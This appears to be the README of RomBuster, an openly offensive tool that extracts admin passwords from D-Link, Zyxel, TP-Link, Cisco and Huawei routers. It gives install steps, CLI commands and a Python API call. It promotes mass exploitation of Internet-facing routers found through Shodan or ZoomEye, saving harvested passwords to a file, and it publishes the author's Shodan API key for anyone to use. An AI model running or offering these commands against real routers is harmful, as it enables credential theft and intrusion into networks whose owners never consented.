RomBuster is a router exploitation tool that allows to disclosure network router admin password.
- Exploits vulnerabilities in most popular routers such as
D-Link,Zyxel,TP-Link,CiscoandHuawei. - Optimized to exploit multiple routers at one time from list.
- Simple CLI and API usage.
pip3 install git+https://github.com/EntySec/RomBusterTo use RomBuster just type rombuster in your terminal.
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network
router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
Exploiting single router
Let's hack my router just for fun.
rombuster -a 192.168.99.1Exploiting routers from Internet
Let's try to use Shodan search engine to exploit routers over Internet.
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgDNOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)
Exploiting routers from input file
Let's try to use opened database of routers.
rombuster -i routers.txt -o passwords.txtNOTE: It will exploit all routers in routers.txt list by their addresses and save all obtained passwords to passwords.txt.
RomBuster also has their own Python API that can be invoked by importing RomBuster to your code.
from rombuster import RomBusterThere are all RomBuster basic functions that can be used to exploit specified router.
exploit(address)- Exploit single router by given address.
Exploiting single router
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')
print(creds)